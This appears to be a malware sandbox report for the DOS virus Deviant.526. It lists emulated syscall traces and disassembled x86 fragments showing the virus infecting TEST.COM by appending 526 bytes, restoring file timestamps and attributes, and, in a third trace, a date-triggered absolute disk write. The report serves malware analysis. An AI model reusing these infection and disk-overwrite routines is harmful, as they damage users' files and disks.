Sample viewer

vx.netlux.org/Virus.DOS.Deviant.526

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:21:42.043399939Z 26 PC: 12a77 | Set disk transfer address
2018-12-17T22:21:42.044735192Z 71 PC: 12a83 | Get current directory
2018-12-17T22:21:42.048782774Z 78 PC: 12a8d | Find first file
2018-12-17T22:21:42.070571003Z 79 PC: 12a8d | Find next file
2018-12-17T22:21:42.073390021Z 79 PC: 12a8d | Find next file
2018-12-17T22:21:42.077030624Z 79 PC: 12a8d | Find next file
2018-12-17T22:21:42.080082978Z 79 PC: 12a8d | Find next file
2018-12-17T22:21:42.083863537Z 79 PC: 12a8d | Find next file
2018-12-17T22:21:42.087804966Z 79 PC: 12a8d | Find next file
2018-12-17T22:21:42.090610921Z 79 PC: 12a8d | Find next file
2018-12-17T22:21:42.093435449Z 67 PC: 12ac1 | Get or set file attributes
2018-12-17T22:21:42.166097501Z 61 PC: 12aca | Open file (Filename = 'TEST.COM')
2018-12-17T22:21:42.177115814Z 66 PC: 12ad6 | Move file pointer
2018-12-17T22:21:42.184173348Z 63 PC: 12ae1 | Read file or device (Read 1 bytes on handle 5)
2018-12-17T22:21:42.189037176Z 66 PC: 12af9 | Move file pointer
2018-12-17T22:21:42.190972588Z 44 PC: 12afd | Get time 0x12afd: mov byte ptr ds:[bp + 0x314], dl
0x12b02: call 0x22a59
0x12b05: mov ah, 0x40
0x12b07: lea dx, word ptr [bp + 0x107]
0x12b0b: mov cx, 0x20e
0x12b0e: int 0x21
0x12b10: call 0x22a59
0x12b13: mov ax, 0x5701
0x12b16: mov cx, word ptr ds:[bp + 0x297]
0x12b1b: mov dx, word ptr ds:[bp + 0x299]
0x12b20: int 0x21
0x12b22: mov ah, 0x3e
0x12b24: int 0x21
0x12b26: mov ax, 0x4301
0x12b29: xor cx, cx
0x12b2b: mov cl, byte ptr ds:[bp + 0x296]
0x12b30: int 0x21
0x12b32: mov ah, 0x4f
0x12b34: jmp 0x12a85
0x12b37: mov ah, 0x3b
2018-12-17T22:21:42.193961827Z 64 PC: 12b10 | Write file or device (Write 526 bytes on handle 5)
2018-12-17T22:21:42.203338105Z 87 PC: 12b22 | Get or set file date and time
2018-12-17T22:21:42.205584391Z 62 PC: 12b26 | Close file
2018-12-17T22:21:42.211431292Z 67 PC: 12b32 | Get or set file attributes
2018-12-17T22:21:42.216888285Z 79 PC: 12a8d | Find next file
2018-12-17T22:21:42.220049524Z 59 PC: 12a9a | Change current directory
2018-12-17T22:21:42.224954887Z 59 PC: 12b3f | Change current directory
2018-12-17T22:21:42.22983831Z 42 PC: 12b43 | Get date 0x12b43: cmp dl, 0xc
0x12b46: jne 0x12b53
0x12b48: mov ah, 9
0x12b4a: lea dx, word ptr [bp + 0x2c3]
0x12b4e: int 0x21
0x12b50: jmp 0x12b5b
0x12b52: nop
0x12b53: mov ah, 9
0x12b55: lea dx, word ptr [bp + 0x2a0]
0x12b59: int 0x21
0x12b5b: mov ah, 0x4c
0x12b5d: int 0x21
0x12b5f: sub ch, byte ptr [0x4f43]
0x12b63: dec bp
0x12b64: add byte ptr [0x2e], ch
0x12b68: pop sp
0x12b69: add byte ptr [bx + si], al
0x12b6b: add byte ptr [bx + si], al
0x12b6d: add byte ptr [bx + si], al
0x12b6f: add byte ptr [bx + si], al
2018-12-17T22:21:42.236549066Z 9 PC: 12b5b | Display string (String= 'Program too big to fit in memory ')
2018-12-17T22:21:42.241179666Z 76 PC: 12b5f | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3783,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:50:15.078717687Z 26 PC: 12a77 | Set disk transfer address
2018-12-25T11:50:15.080113546Z 71 PC: 12a83 | Get current directory
2018-12-25T11:50:15.083877393Z 78 PC: 12a8d | Find first file
2018-12-25T11:50:15.091285462Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T11:50:15.094006804Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T11:50:15.10544217Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T11:50:15.108393269Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T11:50:15.111212976Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T11:50:15.114511714Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T11:50:15.117746272Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T11:50:15.120762417Z 67 PC: 12ac1 | Get or set file attributes
2018-12-25T11:50:15.138838216Z 61 PC: 12aca | Open file (Filename = 'TEST.COM')
2018-12-25T11:50:15.146457126Z 66 PC: 12ad6 | Move file pointer
2018-12-25T11:50:15.14783383Z 63 PC: 12ae1 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:50:15.15008557Z 66 PC: 12af9 | Move file pointer
2018-12-25T11:50:15.151491351Z 44 PC: 12afd | Get time 0x12afd: mov byte ptr ds:[bp + 0x314], dl
0x12b02: call 0x22a59
0x12b05: mov ah, 0x40
0x12b07: lea dx, word ptr [bp + 0x107]
0x12b0b: mov cx, 0x20e
0x12b0e: int 0x21
0x12b10: call 0x22a59
0x12b13: mov ax, 0x5701
0x12b16: mov cx, word ptr ds:[bp + 0x297]
0x12b1b: mov dx, word ptr ds:[bp + 0x299]
0x12b20: int 0x21
0x12b22: mov ah, 0x3e
0x12b24: int 0x21
0x12b26: mov ax, 0x4301
0x12b29: xor cx, cx
0x12b2b: mov cl, byte ptr ds:[bp + 0x296]
0x12b30: int 0x21
0x12b32: mov ah, 0x4f
0x12b34: jmp 0x12a85
0x12b37: mov ah, 0x3b
2018-12-25T11:50:15.153888628Z 64 PC: 12b10 | Write file or device (Write 526 bytes on handle 5)
2018-12-25T11:50:15.162588935Z 87 PC: 12b22 | Get or set file date and time
2018-12-25T11:50:15.164085949Z 62 PC: 12b26 | Close file
2018-12-25T11:50:15.172325036Z 67 PC: 12b32 | Get or set file attributes
2018-12-25T11:50:15.179010798Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T11:50:15.181575791Z 59 PC: 12a9a | Change current directory
2018-12-25T11:50:15.185970078Z 59 PC: 12b3f | Change current directory
2018-12-25T11:50:15.190181751Z 42 PC: 12b43 | Get date 0x12b43: cmp dl, 0xc
0x12b46: jne 0x12b53
0x12b48: mov ah, 9
0x12b4a: lea dx, word ptr [bp + 0x2c3]
0x12b4e: int 0x21
0x12b50: jmp 0x12b5b
0x12b52: nop
0x12b53: mov ah, 9
0x12b55: lea dx, word ptr [bp + 0x2a0]
0x12b59: int 0x21
0x12b5b: mov ah, 0x4c
0x12b5d: int 0x21
0x12b5f: sub ch, byte ptr [0x4f43]
0x12b63: dec bp
0x12b64: add byte ptr [0x2e], ch
0x12b68: pop sp
0x12b69: add byte ptr [bx + si], al
0x12b6b: add byte ptr [bx + si], al
0x12b6d: add byte ptr [bx + si], al
0x12b6f: add byte ptr [bx + si], al
2018-12-25T11:50:15.19241359Z 9 PC: 12b5b | Display string (String= 'Program too big to fit in memory ')
2018-12-25T11:50:15.196735522Z 76 PC: 12b5f | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":12,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3783,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:50:15.160905921Z 51 PC: 12a5c | Get or set Ctrl-Break
2018-12-25T11:50:15.162429891Z 51 PC: 12a64 | Get or set Ctrl-Break
2018-12-25T11:50:15.165022332Z 53 PC: 12a69 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:50:15.166715447Z 37 PC: 12a75 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:50:15.168370951Z 26 PC: 12a7d | Set disk transfer address
2018-12-25T11:50:15.171213688Z 78 PC: 12aa0 | Find first file
2018-12-25T11:50:15.177975394Z 67 PC: 12ac9 | Get or set file attributes
2018-12-25T11:50:15.18491927Z 67 PC: 12b76 | Get or set file attributes
2018-12-25T11:50:15.203289417Z 61 PC: 12ad6 | Open file (Filename = '&�')
2018-12-25T11:50:15.210538692Z 87 PC: 12ade | Get or set file date and time
2018-12-25T11:50:15.211929877Z 63 PC: 12aeb | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:50:15.219780124Z 66 PC: 12b85 | Move file pointer
2018-12-25T11:50:15.221213943Z 87 PC: 12b3a | Get or set file date and time
2018-12-25T11:50:15.222676311Z 62 PC: 12b3e | Close file
2018-12-25T11:50:15.230782026Z 42 PC: 12b47 | Get date 0x12b47: cmp dl, 1
0x12b4a: je 0x12b4f
0x12b4c: jmp 0x12b6d
0x12b4f: cli
0x12b50: mov ah, 2
0x12b52: cdq
0x12b53: mov cx, 0x100
0x12b56: int 0x26
0x12b58: jmp 0x12b5b
0x12b5b: mov al, 3
0x12b5d: mov cx, 0x700
0x12b60: mov dx, 0
0x12b63: mov ds, word ptr [di + 0x99]
0x12b67: mov bx, word ptr [di + 0x55]
0x12b6a: call 0x22b4f
0x12b6d: mov dx, word ptr [bp + 0x24d]
0x12b71: mov ax, 0x4301
0x12b74: int 0x21
0x12b76: ret
0x12b77: mov ax, 0x4200
2018-12-25T11:50:15.233366107Z 67 PC: 12b76 | Get or set file attributes (See above)
2018-12-25T11:50:15.238561739Z 79 PC: 12aab | Find next file
2018-12-25T11:50:15.24132108Z 67 PC: 12ac9 | Get or set file attributes (See above)
2018-12-25T11:50:15.247694853Z 67 PC: 12b76 | Get or set file attributes (See above)
2018-12-25T11:50:15.26147573Z 61 PC: 12ad6 | Open file (See above)
2018-12-25T11:50:15.268678635Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:50:15.271493664Z 63 PC: 12aeb | Read file or device (See above)
2018-12-25T11:50:15.278629843Z 66 PC: 12b85 | Move file pointer (See above)
2018-12-25T11:50:15.280296997Z 87 PC: 12b3a | Get or set file date and time (See above)
2018-12-25T11:50:15.283169828Z 62 PC: 12b3e | Close file (See above)
2018-12-25T11:50:15.291010077Z 42 PC: 12b47 | Get date (See above)
2018-12-25T11:50:15.293448237Z 67 PC: 12b76 | Get or set file attributes (See above)
2018-12-25T11:50:15.299889927Z 79 PC: 12aab | Find next file (See above)
2018-12-25T11:50:15.302874715Z 67 PC: 12ac9 | Get or set file attributes (See above)
2018-12-25T11:50:15.309256485Z 67 PC: 12b76 | Get or set file attributes (See above)
2018-12-25T11:50:15.323408132Z 61 PC: 12ad6 | Open file (See above)
2018-12-25T11:50:15.331022411Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:50:15.332642104Z 63 PC: 12aeb | Read file or device (See above)
2018-12-25T11:50:15.339699513Z 66 PC: 12b85 | Move file pointer (See above)
2018-12-25T11:50:15.34161311Z 87 PC: 12b3a | Get or set file date and time (See above)
2018-12-25T11:50:15.343198485Z 62 PC: 12b3e | Close file (See above)
2018-12-25T11:50:15.350956912Z 42 PC: 12b47 | Get date (See above)
2018-12-25T11:50:15.353849979Z 67 PC: 12b76 | Get or set file attributes (See above)
2018-12-25T11:50:15.359146834Z 79 PC: 12aab | Find next file (See above)
2018-12-25T11:50:15.362112772Z 67 PC: 12ac9 | Get or set file attributes (See above)
2018-12-25T11:50:15.369572672Z 67 PC: 12b76 | Get or set file attributes (See above)
2018-12-25T11:50:15.383838693Z 61 PC: 12ad6 | Open file (See above)
2018-12-25T11:50:15.391804828Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:50:15.394341422Z 63 PC: 12aeb | Read file or device (See above)
2018-12-25T11:50:15.401432352Z 66 PC: 12b85 | Move file pointer (See above)
2018-12-25T11:50:15.402928648Z 87 PC: 12b3a | Get or set file date and time (See above)
2018-12-25T11:50:15.405029377Z 62 PC: 12b3e | Close file (See above)
2018-12-25T11:50:15.413204782Z 42 PC: 12b47 | Get date (See above)
2018-12-25T11:50:15.415281464Z 67 PC: 12b76 | Get or set file attributes (See above)
2018-12-25T11:50:15.420793948Z 79 PC: 12aab | Find next file (See above)
2018-12-25T11:50:15.423689002Z 67 PC: 12ac9 | Get or set file attributes (See above)
2018-12-25T11:50:15.429966944Z 67 PC: 12b76 | Get or set file attributes (See above)
2018-12-25T11:50:15.441660009Z 61 PC: 12ad6 | Open file (See above)
2018-12-25T11:50:15.455904618Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:50:15.45734662Z 63 PC: 12aeb | Read file or device (See above)
2018-12-25T11:50:15.464266788Z 66 PC: 12b85 | Move file pointer (See above)
2018-12-25T11:50:15.466243026Z 87 PC: 12b3a | Get or set file date and time (See above)
2018-12-25T11:50:15.46778662Z 62 PC: 12b3e | Close file (See above)
2018-12-25T11:50:15.475515844Z 42 PC: 12b47 | Get date (See above)
2018-12-25T11:50:15.47836199Z 67 PC: 12b76 | Get or set file attributes (See above)
2018-12-25T11:50:15.483659899Z 79 PC: 12aab | Find next file (See above)
2018-12-25T11:50:15.486313706Z 67 PC: 12ac9 | Get or set file attributes (See above)
2018-12-25T11:50:15.493369427Z 67 PC: 12b76 | Get or set file attributes (See above)
2018-12-25T11:50:15.504303987Z 61 PC: 12ad6 | Open file (See above)
2018-12-25T11:50:15.517551237Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:50:15.51986311Z 63 PC: 12aeb | Read file or device (See above)
2018-12-25T11:50:15.526867668Z 66 PC: 12b85 | Move file pointer (See above)
2018-12-25T11:50:15.528367779Z 87 PC: 12b3a | Get or set file date and time (See above)
2018-12-25T11:50:15.530082416Z 62 PC: 12b3e | Close file (See above)
2018-12-25T11:50:15.537805557Z 42 PC: 12b47 | Get date (See above)
2018-12-25T11:50:15.539998535Z 67 PC: 12b76 | Get or set file attributes (See above)
2018-12-25T11:50:15.545147061Z 79 PC: 12aab | Find next file (See above)
2018-12-25T11:50:15.548279728Z 67 PC: 12ac9 | Get or set file attributes (See above)
2018-12-25T11:50:15.554417123Z 67 PC: 12b76 | Get or set file attributes (See above)
2018-12-25T11:50:15.579686345Z 61 PC: 12ad6 | Open file (See above)
2018-12-25T11:50:15.587124485Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:50:15.588586696Z 63 PC: 12aeb | Read file or device (See above)
2018-12-25T11:50:15.595989266Z 66 PC: 12b85 | Move file pointer (See above)
2018-12-25T11:50:15.59924702Z 87 PC: 12b3a | Get or set file date and time (See above)
2018-12-25T11:50:15.601394014Z 62 PC: 12b3e | Close file (See above)
2018-12-25T11:50:15.610108025Z 42 PC: 12b47 | Get date (See above)
2018-12-25T11:50:15.613973888Z 67 PC: 12b76 | Get or set file attributes (See above)
2018-12-25T11:50:15.618763867Z 79 PC: 12aab | Find next file (See above)
2018-12-25T11:50:15.621520799Z 67 PC: 12ac9 | Get or set file attributes (See above)
2018-12-25T11:50:15.628862614Z 67 PC: 12b76 | Get or set file attributes (See above)
2018-12-25T11:50:15.637755769Z 61 PC: 12ad6 | Open file (See above)
2018-12-25T11:50:15.64289934Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:50:15.644372944Z 63 PC: 12aeb | Read file or device (See above)
2018-12-25T11:50:15.649520523Z 87 PC: 12b3a | Get or set file date and time (See above)
2018-12-25T11:50:15.650774671Z 62 PC: 12b3e | Close file (See above)
2018-12-25T11:50:15.660122058Z 42 PC: 12b47 | Get date (See above)
2018-12-25T11:50:15.664238268Z 67 PC: 12b76 | Get or set file attributes (See above)
2018-12-25T11:50:15.670011747Z 79 PC: 12aab | Find next file (See above)
2018-12-25T11:50:15.672135792Z 37 PC: 12ab4 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:50:15.674069505Z 51 PC: 12aba | Get or set Ctrl-Break